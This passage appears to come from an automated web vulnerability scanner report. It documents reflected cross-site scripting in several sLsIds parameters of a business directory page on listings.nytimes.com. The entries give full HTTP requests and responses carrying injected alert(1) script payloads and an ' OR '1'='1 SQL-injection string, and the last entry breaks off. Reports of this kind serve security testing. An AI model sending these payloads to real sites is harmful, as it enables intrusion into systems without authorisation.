GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-49940135c88"><script>alert(1)</script>78828edc0a634b8c3&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91549
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABRQSAS=HHLKNADAOBDBAOJPDGBKPDKO; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIds6" value="125-557675,125-551396,125-559267,125-533573,125-458445,125-538467,125-471913,125-482897,125-535950,125-49940135c88"><script>alert(1)</script>78828edc0a634b8c3">
...[SNIP]...

4.259. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds6 request parameter is copied into the HTML document as plain text between tags. The payload d90a0<script>alert(1)</script>84b4de0e659 was submitted in the sLsIds6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401d90a0<script>alert(1)</script>84b4de0e659&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:28:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401d90a0<script>alert(1)</script>84b4de0e659&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-
...[SNIP]...

4.260. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds7 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds7 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 835c0"><script>alert(1)</script>8988671dc75e5889f was submitted in the sLsIds7 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932835c0"><script>alert(1)</script>8988671dc75e5889f&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91549
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADQTTDT=IANHKJGAIBLKCFHAGAEACNMH; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIds7" value="125-486445,125-529496,125-429362,125-501989,125-502772,125-534073,125-530131,125-494155,125-517168,125-557932835c0"><script>alert(1)</script>8988671dc75e5889f">
...[SNIP]...

4.261. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds7 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds7 request parameter is copied into the HTML document as plain text between tags. The payload 32720<script>alert(1)</script>82a8a46f040 was submitted in the sLsIds7 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-55793232720<script>alert(1)</script>82a8a46f040&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-56031
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:29:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-55793232720<script>alert(1)</script>82a8a46f040&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310
...[SNIP]...

4.262. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds8 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds8 request parameter is copied into the HTML document as plain text between tags. The payload 45afa<script>alert(1)</script>6dcd5260b6d was submitted in the sLsIds8 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
34073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-57035945afa<script>alert(1)</script>6dcd5260b6d&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:30:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-57035945afa<script>alert(1)</script>6dcd5260b6d&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-
...[SNIP]...

4.263. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds8 parameter]  previous  next

Summary

Severity:   High
